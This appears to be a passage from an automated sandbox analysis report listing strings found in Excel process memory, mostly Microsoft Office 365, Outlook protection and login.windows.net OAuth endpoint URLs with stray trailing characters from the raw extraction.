      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comL
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coma
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comf
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.compDy
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comt
      Source: EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outl
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(R
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)S
      Source: EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize47
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4V
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize56
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize65
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7K
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8S
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9R
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;7
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;V
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?R
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeBR
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCQ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCS0
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG_
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH5A
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeHT1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIK0
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQR8
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRSC
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeSR
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV_?
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXKA
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_TF
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh7
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehV
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizejT
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelR
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemQ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemS
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenR
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizexU
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeyT
